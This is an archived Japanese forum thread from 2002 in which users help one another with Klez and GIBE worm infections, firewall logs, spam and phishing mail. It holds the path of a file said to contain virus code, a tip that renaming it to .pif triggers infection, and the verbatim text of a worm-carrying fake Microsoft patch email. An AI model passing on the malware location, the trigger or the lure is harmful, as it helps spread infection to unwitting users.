>>358 351の人って、実行ファイルがいくつか逝っちゃってるよね、なんだか。
360 :
名無しさん@お腹いっぱい。 :02/03/06 20:57
おーい・・・
362 :
名無しさん@お腹いっぱい。 :02/03/06 21:12
>>362 ?
AntiVirは対応できてるのかなと、ちょっと気になってつぶやいただけですよ。
Klezじゃないような気がする。 humorで検索するとBadtrans.BとPlageがヒットするけど、それでもなさそう。 推測だけどね。
351はどうしたのかなぁ…
>>365 EXE破損してそうだから、アンチウイルスソフトまともに起動できるのかなぁ?
今ごろOSも起動していない可能性高いね・・・
このスレは351追悼スレになりました。 帰ってこれるかなあ。
南無阿弥陀仏。 帰ってこ〜いよ〜
370 :
351 ◆enghYAOw :02/03/06 23:14
ども…生きてますよ。 OSはWINMEです。MEのシステム復元とかいろいろ試してみたけどダメでした… ゎぁぁ、どないしよ〜
>>370 メールの件名と本文と添付ファイル名が知りたい〜
372 :
351 ◆enghYAOw :02/03/06 23:23
>>371 件名は「A humor game」で
本文は
This is a humour game
This game is my first work.
You're the first player.
I wish you would like it.
でした。
あと、添付は「install.exe」と「mose[1].htm」でした。
htmのほうは、説明書かなと思ってinstall.exeを起動した後で開いてみると
「メッセージの作成」ウィンドウが何個も表示されるブラクラでした。
メールの送信元(友人)にとりあえず状況を説明して、
他の人に同じようなメールが行ってないか確認しました。
だけど
>>361 さんの情報を読んでみると、どうやら自分のアドレス張からランダムに
選ばれるらしいのでムダだったようです。
ぅゎぁぁ
>351 とりあえずアンチウィルスソフトで検出結果を教えてくれー
>>372 該当するの、見つからないね。
アンチウイルスで検出した名前が知りたい。
とりあえずゴミがよく放り込まれるところ
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
HKEY_LOCAL_MACHINE \Software \Microsoft \Windows \CurrentVersion \Run*
HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \Run
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
<ファイル名を指定して実行→msconfigでチェック>
システム設定ファイル「Win.ini」のwindowsセクションにある、「load=」と「run=」の項目
「System.ini」内の「shell=」の項目
「Autoexec.bat」
375 :
351 ◆enghYAOw :02/03/06 23:31
>>375 亜種がたくさんあるので症状からは断定できません。回線繋いでないで
早くアンチウィルス買えー!ゴルァ
要は、レジストリの自動実行のサブキーに書かれているファイル名を検索して、その後googleで検索すればいいんだよね。
379 :
351 ◆enghYAOw :02/03/06 23:40
KLEZの変種か亜種だったんだね。 あ、もらっておけばよかった(鬱
351 応答せよ!
382 :
351 ◆enghYAOw :02/03/06 23:49
う〜ん。再起動したけどやっぱりダメでした・・・ さっきのツール起動するとノイズは収まるんですけど… やっぱアンチウィルス買うべきか… 前からいると思ってましたし明日見てくることにします。 ご協力ありがとうございました〜〜!! また困ったことがあったらよろしくお願いしますね〜(藁 >>cheshire-catさん まだ残ってますよ〜。いります?(笑
>>382 送ってちょ。
レジストリのサブキー、自分のに感染させて遊びながら調べてみます、週末に。
結局お力になれずスマソ。
384 :
名無しさん@お腹いっぱい。 :02/03/06 23:57
@mb.infoweb.ne.jp からウィルス メールがきたんですけど 捨てアドなんですか?教えてください
385 :
351 ◆enghYAOw :02/03/06 23:58
贈りました。(×送り) OutLookだと見ただけで感染しちゃうとかしないとか… その辺のことはよく分かりませんが気をつけてください。 それでは寝ます。 オヤスミ〜(-Д-)Zzz...
>351 明日アンチウィルス買ってウィルス名わかったら報告してね。
387 :
名無しさん@お腹いっぱい。 :02/03/07 00:00
388 :
351 ◆enghYAOw :02/03/07 00:00
>>384 ぜんぜん捨てアドじゃないっすよ。@niftyの過去形みたいなもんです。
会員しか持ってないアドレスですよ。
389 :
名無しさん@お腹いっぱい。 :02/03/07 00:06
>>388 ってことは調べてもらえば住所とかわかるんですよね?どうすればいいんでしょう?
351さん教えてください
>>389 簡単そうに言うなよw
相手の住所だぞ!?
民事訴訟を起こすために必要だと“証拠書類をそろえて”niftyに言えば? 他の理由じゃ無理だから。
392 :
名無しさん@お腹いっぱい。 :02/03/07 00:57
>>384 「@mb.infoweb.ne.jp」は
昔、富士通が「Infoweb」というプロバイダをやっていた頃に
会員が使っていた物です。
ただ、そのメアドからメールが届いたからと言って、
そのメアドが実在するとは限らないし、
実在したとしてもその所有者がメールを送ったとは限りません。
ウィルス送るのにわざわざ自分のメアドを晒すヤツなんていませんからね。
>>391 プライバシーの問題があるから個人で依頼しても無理。
警察とか弁護士にやらせないと。
393 :
名無しさん@お腹いっぱい。 :02/03/07 01:31
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.209.198.0-61.209.199.0
b. [ネットワーク名] HAKO-NET
f. [組織名] 株式会社ニューメディア
g. [Organization] Newmedia Co.,Ltd
m. [運用責任者] KS7400JP
n. [技術連絡担当者] KS7400JP
p. [ネームサーバ] dns3.odn.ne.jp
p. [ネームサーバ] ns.ncv.ne.jp
y. [通知アドレス]
[email protected] [割当年月日] 2001/07/10
[返却年月日] 2002/04/30
[最終更新] 2002/01/23 10:03:18 (JST)
[email protected] odnと記載されてる所があるんですが、どういう事なのでしょうか?
何の話だ?
395 :
名無しさん@お腹いっぱい。 :02/03/07 16:30
>>393 odnの奴がHAKO-NETを踏み台にしてんじゃないの?
調べたら、検出名はKLEZ.Eでした。 サブキーがちょい違うような。
ADSLでPCがデータのやり取りしていないときでも、 モデムのDATAランプが点灯するときって何なのでしょうか? (ルーターとZoneAlarm使っています) なーんか、気になってしまうのですが・・・
404 :
名無しさん@お腹いっぱい。 :02/03/08 11:39
どなたか教えてください。 2chの板の書き込みから、IPがわかるものなのでしょうか? そういうプロがいると聞いたのですが・・・
ZoneAlarmのログです。 これってポートスキャンなんでしょうか? FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:5845,202.223.100.104:139,TCP (flags:S) FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:5971,202.223.100.104:445,TCP (flags:S) FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:6241,202.223.100.104:139,TCP (flags:S) FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:6290,202.223.100.104:137,TCP (flags:S) FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:6344,202.223.100.104:445,TCP (flags:S) FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:6803,202.223.100.104:138,TCP (flags:S) FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:7172,202.223.100.104:139,TCP (flags:S) FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:7174,202.223.100.104:137,TCP (flags:S) FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:7180,202.223.100.104:445,TCP (flags:S) FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7235,202.223.100.104:138,TCP (flags:S) FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7236,202.223.100.104:137,TCP (flags:S) FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7239,202.223.100.104:138,TCP (flags:S) FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7244,202.223.100.104:138,TCP (flags:S) FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7298,202.223.100.104:137,TCP (flags:S) FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7299,202.223.100.104:445,TCP (flags:S) FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7300,202.223.100.104:139,TCP (flags:S) FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7301,202.223.100.104:138,TCP (flags:S) FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7303,202.223.100.104:137,TCP (flags:S) FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7360,202.223.100.104:445,TCP (flags:S) FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7417,202.223.100.104:139,TCP (flags:S) FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7421,202.223.100.104:138,TCP (flags:S) FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7423,202.223.100.104:137,TCP (flags:S) FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7483,202.223.100.104:445,TCP (flags:S) FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7538,202.223.100.104:139,TCP (flags:S)
>>405 って、ログコピペ厨ですか?初心者質問でごめんなさい。
Hotmail Account Temporarily Unavailable We apologize, but your account is temporarily unavailable. This delay does not affect the entire site or relate specifically to your account, but the machine that holds your account information is temporarily unavailable. We do not expect this delay to last much longer, so please continue to check our site for your account status. We will do our best to make your account available as quickly as possible. We appreciate your support, and sincerely apologize for the inconvenience.
ActiveX 切るJava切るってインターネットオプションのセキュリティ設定の どの部分を切ればいいんですか?
このごろ頻繁に「IEがエラーを起こしましたうんぬん」とウインドウが出て ブラウザが強制終了されてしまうのですが、ウイルスのしわざではありませんか??
>>411 そう思うんだったらウイルスチェックしろって
関係ないだろうけど
>>411 正直、それ聞かされただけじゃ何とも言えん。
レスありがとうございます。 IEのバージョンは5.0、OSはWIN2000です。 ウィルスチェックは、ソフトを持っていないんで、無料のサービスを 利用して確認しましたが、何も検出されませんでした。
>414 ソフトを持っていないのなら問題外。 今すぐ買って来い。 そしてIEの再インストール。」その後パッチを当てるのを忘れずに。
416 :
名無しさん@お腹いっぱい。 :02/03/08 22:53
ぷちサーバ管理者です セキュリティをかけてないディレクトリにある画像ファイルを セキュアなサイトから読み込むと「セキュリティ情報の確認」のダイアログ出ますよね? 閲覧者側(ブラウザ)の設定をそのままに、サーバ側の設定で その確認ダイアログが出ないようにする方法ってありますか? ちなみに画像は、セキュリティをかけてないサイトからも セキュアなサイトからも、ダイアログを出さずに参照できるようにしたいのです。
417 :
名無しさん@お腹いっぱい。 :02/03/08 22:55
age
418 :
名無しさん@お腹いっぱい。 :02/03/08 23:15
>>418 > この文を色々な板にコピペしてくれると助かります
誰がお前らなんか助けるか。
420 :
名無しさん@お腹いっぱい。 :02/03/09 01:36
421 :
名無しさん@お腹いっぱい。 :02/03/09 03:35
ちょっとおしえてください 串チェックで 刺してるのに 兆候なしってなんでですか?
423 :
名無しさん :02/03/09 19:22
下らん質問です。
携帯に毎日数通スパム送ってくる
[email protected] を殺したいんですけど。
どうやら偽りメールではなさそう・・・。実在するみたい・・・。
424 :
名無しさん :02/03/09 19:23
>>423 携帯からしこしこスパム打つやつはいないだろ。
そのアドレスは利用されてるだけかも知れない。
何も考えずに他人のメルアドを晒すなよ。バカか?
freemail と pub.to で賞金サイトに応募してるんだけど、 freemail の方はまったく来ないのに、pub.to のアドレスには コレア方面からのスパムが満載。 どこから漏れてんだ?
429 :
名無しさん@お腹いっぱい。 :02/03/10 00:38
430 :
名無しさん@お腹いっぱい。 :02/03/10 01:02
近頃またsubjectがRe:のメールがよう来るようになったのですが、今更流行りだしたんですかアレ? それとも単にヴァカが今更感染しただけなのですか? 教えろよゴルァ!!
431 :
名無しさん@お腹いっぱい。 :02/03/10 03:16
433 :
名無しさん@お腹いっぱい。 :02/03/10 03:44
困っています。 悪名たかいYahooBBに加入しています。 3日前から、なぜかメールが受信できないんです。 YBBアカウントに関しては、受信できるのですが、 他のアカウントのメールを受信しようとすると、 ログオン画面が出て、「パスワード」を要求してきます。 (今まではそういうのが出たことはなかったです) ツール<アカウント<サーバで確認してみると、 STMPのところがなぜか書き換わっていて12.0.0?みたいなみなれない番号が書いてありました。 (ほかのアカウントもそうなっていました) これは、なにを意味するんでしょう? 気持ち悪さ爆発です… どなたか教えてください.…
つけくわえ。 メーラーはこれまた悪名たかい、OUTLOOKEXPRESSです。 OSはwin98。 さっき試してみたら、IEでページは見れているにもかかわらず、 OUTLOOKEXPRESSは、「現在インターネットに接続していません」などと 言ってきました… 恐ろしいです。
>>433 他のアカウント用のを作り直せば?
あとウイルスチェックもしておきな
レス、どうもです。 昨日、作り直したんですが、 今日見てみると、また書き換わっていたのです… ウイルスチェックは、いま、やっているところ…
438 :
名無しさん@お腹いっぱい。 :02/03/10 14:47
あるサイトにアクセスしたらいきなり「インストールの準備をしてます」 の表示が現われて、その後ブラクラになりました。 なにかやばいソフトをインストールされている可能性はありませんか? もしあるとしたらどんなソフトの可能性がありますか? システムの復元を利用したのですが、そんなので元の状態になおすことは可能ですか?
inetnum: 61.187.0.0 - 61.187.255.255 netname: CHINANET-HN descr: CHINANET Hunan province network この中国人が延々とポートスキャンらしきことを(攻撃かも) 延々としてきて困ります。ルーターのログはこんな感じ。 2002年3月10日 14:01:41 Unrecognized access from 61.169.29.12:1258 to TCP port 80 2002年3月10日 14:09:02 Unrecognized access from 61.169.29.12:3992 to TCP port 80 2002年3月10日 14:09:06 Unrecognized access from 61.169.29.12:3992 to TCP port 80 2002年3月10日 14:11:22 Unrecognized access from 61.224.181.56:3726 to TCP port 80 2002年3月10日 14:11:25 Unrecognized access from 61.224.181.56:3726 to TCP port 80 2002年3月10日 14:30:15 Unrecognized access from 61.144.248.123:3250 to TCP port 80 2002年3月10日 14:30:18 Unrecognized access from 61.144.248.123:3250 to TCP port 80 2002年3月10日 14:33:41 Unrecognized access from 61.128.103.81:2401 to TCP port 80 2002年3月10日 14:33:44 Unrecognized access from 61.128.103.81:2401 to TCP port 80 2002年3月10日 14:40:30 Unrecognized access from 61.177.59.75:4063 to TCP port 80 2002年3月10日 14:40:33 Unrecognized access from 61.177.59.75:4063 to TCP port 80 こんな感じでかれこれ一月以上続いてます。 そのせいか、ネットが一時的に切れることが多々あり困っています。 どうすれば良いでしょう?
ログを貼られてもうざいのでやめる。
ADSL開通してFW入れたばかりで、 よくわかないんだがこいつはなにがしたいの↓ The firewall has blocked Internet access to your computer (ICMP Echo Request ('Ping')) from 217.172.210.96.
>>442 よく勉強し直してくれ
pingを打たれてる
>>442 ただ単に、君のIPアドレスが使われているかどうかチェックしただけ、イタリアから。
445 :
名無しさん@お腹いっぱい。 :02/03/10 21:40
ルータの内部時計が恐ろしく狂うので、定期的に自動で調整したいと思うのですが、 ルータの設定はtelnetとかではできなくて、httpのみで提供されています。 ルータ設定ページに行って、管理者のパスワードを入力して、正しい時刻を入力して、 「設定」ボタンを押すという処理を、自動でやってくれるようなソフトってないですか? LinuxでもWindowsでも構いません。よろしくっす。
446 :
名無しさん@お腹いっぱい。 :02/03/10 21:43
会社でwingateとかゆーものを導入しましたが、 どのようなことができるものですか?
447の人の時間合わせについてのレス、446と書き込み時間が前後してブルブル。 マーフィーの法則のような。
さっそくどうも。ていうかせっかくいただいたレスですが、申し訳ないことに、 意味がわからんす。locateでtimeのつくファイルを検索汁ってこと? すまないすけど、もうちょっとヒントください。
オミトロンとは?
オミトロングーグル見たけどよくわからなかった。 昨日まで普通に見れてたんだけどなぁ
あっ、見れた。さっきのはなんだったんだろ?
458 :
名無しさん@お腹いっぱい。 :02/03/11 04:15
なんか私のパソコンがこの頃よく固まるんですけど、ウイルスとかに感染している危険性ってありますか? 一日一回は固まります・・・
Shields UP !にてポートスキャンをする際の接続は 串を刺したままなのか、生なのかどちらですか?
463 :
名無しさん@お腹いっぱい。 :02/03/11 22:28
easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 をふんでしまいました。 ノートン先生が赤く光ってます。 今スキャンが終わったんですが、感染報告なしです。 いったいどうなっているのでしょうか? 感染してないんですかね。
普通に落とせたけど
>>463 それってエクステンションというか拡張子、mp3だよね。
ただ単にファイルにウイルスのコードがあるんで、チェックされただけかと。
METALLICA_SONG.MP3.pifにしてダブルクリックしたら感染するよ、確か。
466 :
名無しさん@お腹いっぱい。 :02/03/11 22:46
>>465 そうなんですか。ありがとうございます。
これについて調べたら危険度高とかなってるし、ガクガクでした。
>>464 ファイルが壊れててダウソできませんでした。
ありがとうございました。
>>458 9x系とかMeだったら固まるのは宿命の女。
>>467 うちのサブパソの98SE、固まらないよ。
使っているうちに、徐々に壊れていくんだろうね。
丸ごとバックアップで無傷。
さっき、変なメールが届いていました。
英文で、「このメールは届きませんでした」みたいなことが書いてあり、
Fromは、わたしのアドレス、To:
[email protected] となっていて、添付ファイルはHTML(IEマーク)とdatと、infファイルでした。
odnとは何のかかわりもないし、おくった覚えもないので、
開かずに削除しましたが、
この間からメーラー(outlookexpress)の調子も悪いし、
ちょっと気持ち悪いです。
環境はwin98、YBB(ADSL)、ノートンとゾーンアラームを入れています。
どうして、おくった覚えのないメールが帰ってくるのでしょう???
つづき。 infの拡張子つきってあたりが、気持ち悪いです。 どなたか、どういう可能性があるのか、ご教授ください。
>>470 1 返信のフリをしているだけ。
2 知らないうちにトロイを仕込まれていたが、送り先のアカが削除された。
3
>>470 の別人格が送った。
>>472 レス、どうも。
1,2,3いずれにしても、
こわいっすねー。
とくに3、こわいです。
トロイは、とりあえず最新のデータでは検出されてないので。
削除しちゃったからくわしく調べられないのがくやしいけど…
パソコンを起動するたびに自動的にネットにつながり 必ず2chのモーニング娘。の掲示板に行ってしまいます 「ぱちんこのうちあわせのほほんのほほん」とわけのわからない言葉が上に書いてあります どうすればいいのでしょうか?
>>474 電話線を抜くとインターネットに繋がらなくなります。
それか、リカバリをしてください。
476 :
困ってます。 :02/03/12 05:53
>474 私も同じです。 他板でも同じ質問を見かけましたが、まだ解決まで いたらないようです。 IEを再インストールしたらウインドウの pachinko utiawase nohohon nohohon という文字は以前のように Microsoft Internet Explorer に戻ったのですが、起動するとやはりモ娘(狼)が開かれます。 ホームはYahooに設定してあるし、Web設定もリセットしましたが、 直りません。 ウイルススキャンにも引っかかりませんでした。 対処方法の分かる方がいらっしゃいましたらどうか よろしくお願い致します。 PCはFUJITSU DESKPOWER C3/50 です。
>>476 IEのインターネットオプションの、WEBの設定のリセット。
お聞きします〜 Win XP proをDLしました。 交換でもないのにずっと繋いでてくれて・・・・ 昨日までは相手の共有結構あったんですが今日見てみたら サーバーはちゃんと接続されているのに共有0、情報応答しない状況です かれこれ2日は繋ぎっぱなしなんだけどいい人じゃなくてやばい人?? XPは一番出回っているサイズです。
>>479 犯罪者は自首しましょう
罪も軽くなります
いやなら死んでね
481 :
名無しさん@お腹いっぱい。 :02/03/12 10:41
>>479 このご時世、DOMにそれだけのモノを素直に落とさせてくれるのは
十中八九、トロイ入りに決まってんだろ。
>>479 言い忘れたけど、ファイルサイズなんて簡単にねつ造出来るから
信用できないぞ。
483 :
名無しさん@お腹いっぱい。 :02/03/12 11:32
フリーのZoneAlramを使用していましたがこの度ウィルスバスター2002を導入するためアインストールしようとしましたが出来ません。VSNETUTILS.DLLというファイルが見つからないとのエラーが出ます。どうしたらよいのでしょうか?誰か教えていただけないでしょうか?
484 :
名無しさん@お腹いっぱい。 :02/03/12 13:52
>>483 ウィルスバスターのファイヤーウォールはあって無きに等しきもの。
それでもアンインストールすると言うなら止めないけど。
485 :
名無しさん@お腹いっぱい。 :02/03/12 16:20
HOTMAILについて質問です。 パスワードを忘れてしまいました。変更しようと思いましたが パスワード変更の時に必要な質問の答えも忘れてしまいました。 大事なメールが入っている為、どうしても開きたいのですが無理です。 パスワードを解読する方法ってありますか?教えて下さい。
>>485 素直にHotmailに助けを求めればいいだろう。
なぜそうやって裏技方面を模索するんだ?
>>487 485じゃないが、この条件なら無視されるのは明らか。それくらいわからんか?
>>458 無理。たとえ知っている奴がいたとしても教えるわけが無い。
あきらめろと言いたかった…
491 :
名無しさん@お腹いっぱい。 :02/03/13 01:55
ノートンインターネットセキュリティーにQ2に接続しないようにする機能ってついてます?
492 :
名無しさん@お腹いっぱい。 :02/03/13 02:08
Subjectが「Internet Security Update」。
送信元は「"Microsoft Corporation Security Center" <
[email protected] >」。
添付ファイルとして「q216309.exe (162k)」がありました。
このようなメールを受け取った方いますか?
マイクロソフトから添付ファイルを寄越してくるとは思えないのですが・・・。
>>492 いかにも怪しい。そんなサービスをしてくれるような会社じゃないし^^;
494 :
名無しさん@お腹いっぱい。 :02/03/13 02:15
>>493 私もそう思います(^^;
ウイルススキャンには引っ掛かりませんでしたが、
バックドアが仕込まれたトロイではないかと思ってます。
>>495 バカフィィ!!!1000円で買ったんだけど、入れるのやめようかな・・・
でも無いよりは、ましか。
いきなり添付ファイルを実行する人はいないと思いますが、
「Microsoft Corporation Security Center」を騙っているので警告。
添付ファイルはいわゆるトロイです。(下記参照)
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_GIBE.A 差出人:Microsoft Corporation Security Center
件名 :Internet Security Update
添付 :q216309.exe (162k)
本文の一部を転記します。
--
Microsoft Customer,
this is the latest version of security update, the
"7 Mar 2002 Cumulative Patch" update which eliminates all
known security vulnerabilities affecting Internet Explorer and
MS Outlook/Express as well as six new vulnerabilities, and is
discussed in Microsoft Security Bulletin MS02-005. Install now to
protect your computer from these vulnerabilities, the most serious of which
could allow an attacker to run code on your computer.
普通は Dear Customer, ですね。
499 :
名無しさん@お腹いっぱい。 :02/03/13 02:55
ノートンアンチウイルス2002のウイルス定義ファイルの状態がエラーになってます。 最新版をDLしてもエラーのままです。 原因はわかりません。インストールしなおすしかないんでしょうか?
501 :
名無しさん@お腹いっぱい。 :02/03/13 03:23
学割パックのあるADSLのセキュリティソフトってありますか?
502 :
名無しさん@お腹いっぱい。 :02/03/13 03:40
うちにも1時間ほど前、ワームが添付されて届きました。 ファイルサイズは、492さんと同じくらい(149KB?)で、 試しにディスクに保存(デスクトップ上)してみようとしたら、 AGVが激しく反応。WORM_GIBE.A、ってとこまで一緒… 削除したけど。そのあと、ANTIDOTEも走らせたりして。 感染は防いだけど… なんなんでしょう.. この間から変な添付ファイルがたくさん送られてくる… ま、YBBだから仕方ないかな。
503 :
名無しさん@お腹いっぱい。 :02/03/13 03:47
editor-○○○○@eros.stoen.net うざ〜〜〜〜〜〜〜〜〜! 最近スパムばっかり・・・・・・。
504 :
名無しさん@お腹いっぱい。 :02/03/13 03:48
ここ何日かネットの繋がりが悪いなと思っていて調べてみたら、接続先が 全然知らない番号になっていました。 ネットを始めたばかりなもので、かなりびびってます。 こっれってやばいですか? 今は通常の番号に戻したのですが・・・
506 :
504です。 :02/03/13 04:12
電話回線につなげて、使うたびに接続するんですが、初心者なもので 環境は?という答えにあっているかわからないんですが・・・
激しく既出な内容かもしれないですが、見つからなかったので質問させてください。 セキュリティ関連サイトでは、ルータ+PFWソフトの使用を推奨していますが、 実際ルータで区切ったLAN環境内でPFWソフトを使用するメリットはあるんでしょうか? 当方自宅にてADSL接続をブロードバンドルータを使用し共有しており、PFWソフトを 導入するかどうかで悩んでいます。 有識者の皆様、マジレスお願い致します。
508 :
名無しさん@お腹いっぱい。 :02/03/13 04:43
さっきメールチェックしたら150通も届いてました。 読んでみると同じメール出さないで下さいという抗議の メールばっかり。もちろん出した覚えはありません。 ウイルスバスター入ってるのですが何かに感染してるのでしょうか?
509 :
名無しさん@お腹いっぱい。 :02/03/13 06:37
教えてください。
先週自分のサイトの掲示板に○○○.jpgというアドレスが貼られていて、
それをクリックしたらOutlookExpressが100個以上開いたんです。
ブラクラの一種だろうと思いその記事を削除しただけでほっておいたのですが、
今日は掲示板を開いただけでOutlookexpressが105個も開きました。
開き終わったら普通に閉じることができるのですが、これってなんでしょうか?
相手のIPは164.41.2.21、開いてしまったOUTLOOKにはメールのあて先に
[email protected] (数字が1ずつ違うものが105個)でした。
詳しい方教えてください。
510 :
名無しさん@お腹いっぱい。 :02/03/13 06:45
メールの送信者偽装ってできるんですか? 自分のアドレスが送信者だったんですけど どうやるんでしょうか?
>>509 リンク先がjpgじゃなくて実はhtmlファイルだったのかと。
そこにメールストーム仕掛けただけ。
>>510 ウイルス感染中、とか。
>>507 有識者ではないけれど、参考までに。
ルータ(タイプのADSLモデム)とPFW(Zone Alarm)を使用しています。
Zone導入は一月くらい前ですが、過去に二度ほどルータをかいくぐって、
PCまでやってきた攻撃(?)があります。Zoneでブロックしましたけど。
フリーのPFWは結構あるし、アンチウイルスとセットになってるのもあるので、
導入しても悪くはないと思います。
>>511 ありがとうございます。
もう掲示板閉鎖します。
>>512 マジレス感謝です。
ルータかいくぐって攻撃されることもあるんですね。
早速Zone Alarm入れてみます。
XPを2ヶ月前買ったばかりですぐにHikaruとMadokaを踏みました。 最近エンターキーの下あたりで不定期に「ゴロッ」という音がします。 しないときはしないし、するときは数十秒に一回ぐらいの頻度です。 これはウイルスと関係あるのでしょうか?タスクを覗いても 「ozawa.exe]は実行されていないようですが・・・。
517 :
名無しさん@お腹いっぱい。 :02/03/13 15:47
ハッキングって結局どのくらいのことができるんですか? 他人のハードディスクの中身を見たり盗んだりできるんですか?
企業系ネトオチしてます。IPについて質問しる。 pxxx-dnaxxsurugadai.tokyo.ocn.ne.jp pxx-dnaxxsurugadai.tokyo.ocn.ne.jp 上記、メールのヘッダに付いてたIPと某掲示板にでてたIPなんだけど かぎりなく上記IPは同一人物と考えてよいのかな? また、数時間違いで同じIPでの掲示板書込みやメール送信があった 場合は同一人物の書き込みと判断して良いのかな? 書込んだ本人に聞いたらH''で書込んだって言うんだけど H''で書込みしたら xx~ocn.ne.jp って掲示板に記録される可能性って ありえる事なのかな? 教えてクンでスマンけど、以上3つ質問の回答お願いします
>>519 何のホストか分かりませんが、恐らくこうなってます。
pxxx-dnaxxsurugadai.tokyo.ocn.ne.jp
| | | | | |
| | | | | |
Aさん Bさん Cさん Dさん Eさん Fさん・・・
xxxの数だけ同じ構造のものがあると思いますので、
xxxが1と2では構成している人が全く違います。
その掲示板で見る限り「Aさん」と「Bさん他」の違いは全くありません。
メールのIDとヘッダのIPアドレス以外に「Aさん」と「Bさん他」の違いは殆どありません。
A1. メールと掲示板に関連性がなければ、同一人物とは言い難いです。
A2. 同じ条件の人が集中し難い(地域限定、ISP限定でない)掲示板なら
可能性は高いですが、断言は出来ません。
A3. H"=キャリア(ADSL、ISDN等、回線の一つ)≠ISPなので十分有り得ます。
ちなみにIPとは言いません、ホストネームと呼んであげてください。
「〜しる」とは「〜しろ」という意味です。
>>515 ここにもマルチしてたのね・・・ヽ(`Д´)ノ
522 :
名無しさん@お腹いっぱい。 :02/03/13 23:53
ルータについて聞きたいのですが、どこの板に行けばいいのかな?
>>522 ルーターの何について知りたいのかで判断するべし。
無難なところでは、初級ネット、初心者、PC初心者あたり。
ここも万質問箱みたいなもんだけど。
524 :
名無しさん@お腹いっぱい。@522 :02/03/14 00:37
>>523 ありがとさんです。
お勧めのルーターがあれば教えて欲しいと思いまして・・・
AR320なんかは、どうでしょうか?
今、NTT-MEのBA5000SOHOなのですが、最悪なのです。
設定してもろくに動いてくれません。バーチャルホストも気分次第で
動く状態です・・・。
526 :
教えてくん :02/03/14 03:56
527 :
名無しさん@お腹いっぱい。 :02/03/14 05:33
528 :
名無しさん@お腹いっぱい。 :02/03/14 05:42
529 :
名無しさん@お腹いっぱい。 :02/03/14 06:01
知らない間にウイルスに感染していたみたいで マックの人にメールを送ったら「添付ファイルがついていて開いたらエラー」が でたと…。 私はwinなんですけどマックにも感染するんでしょうか?
>>529 開いたらエラーって言うより、開こうとしたらエラーが出ます。
開けないのでエラーが出ます。
531 :
名無しさん@お腹いっぱい。 :02/03/14 12:43
うちの会社にメールウイルスが来たんだけど、 NAV コーポレートエディションにもひっかからない。 ひょっとして新種? 特徴だけど、メールのsubjectはなんと日本語で、 「重要なお知らせ」とか「Re: 例の件」とかになってる。 で、アドレス帳を読み込んでメールしまくるお決まりのタイプらしい。 本文は空っぽ。 添付書類として「patch.exe」という約13KBのファイルがついてる。 がいしゅつかもしれないけど、このウイルスのこと知ってる人いたら教えて! Symantecにもトレンドマイクロにも全然情報がないみたい。
うちにも「R:重要」できました、新種では?
>>532 来ましたか!
こちらは感染マシン3台出ました。
とりあえずイーサケーブル抜いて情報待ちですね…
534 :
名無しさん@お腹いっぱい :02/03/14 13:13
>>531-532 おいらのところの社内でも開いたやつがいて、今、そのメールが飛びまくってます。
ほんと、どこ見ても情報が無い。
どなたか、情報щ(゚Д゚щ)クレ〜
535 :
名無しさん@お腹いっぱい。 :02/03/14 13:19
ハッキングは、侵入するだけで 基本的に何もしません 盗んだり、壊したりするのはクラッカーです。
536 :
名無しさん@お腹いっぱい。 :02/03/14 13:27
>>537 おお!すごい!神!
でも、こいつ古いウイルスですね。しかも感染報告なしだって?
NAVの最新パターンファイルでもひっかからなかったってことは
亜種でしょうか?
539 :
名無しさん@お腹いっぱい。 :02/03/14 13:39
>>537 これの亜種だべ?
ウイルスバスターもノートンも全く反応しないYO!
あ、いや、違った。そんなに古くなかった。 単にSymantecが未対応なだけ? Webのウイルスデータベースにも記載されてなかったし。
>>541 これ(の亜種)に間違いないみたいですね。
説明を見る限りでは、大したことなさそうに見えますけど
安心していいんですかね。
駆除ツールとか、パターンファイルの更新とかを待たなくても
添付されてきたexeファイルを捨ててしまえば終わりってことでしょうか?
544 :
名無しさん@お腹いっぱい。 :02/03/14 16:44
winからマックにウイルス送ったら感染する?
>>544 マックにWindowsが入っていて実行できれば。
パソコンの電源はどうやって消せばいいのですか?
>>546 UPSが無いデスクトップパソコンならコンセントを抜けば停止します。
ノートパソコンは、バッテリーを抜いた上で上記措置を・・・
ネタにマジレス カコ(・∀・)イイ!!
549 :
名無しさん@お腹いっぱい。 :02/03/14 23:51
Subjectが「重要」「例の件」「極秘」「うんこ」といった思わせぶりな日本語に なっている。 ・・・「うんこ」って思わせぶりな日本語か?(w
551 :
教えてください :02/03/15 01:56
最近エロサイトウロウロしていたら、何かデフォルトの ページがwww.pedo.wsとかになってしまったんです。 オプションで何度YahooとかMSNとかに書き換えても、 立ち上げなおすとまたそれに戻るんです。 どうすれば直るのでしょうか?
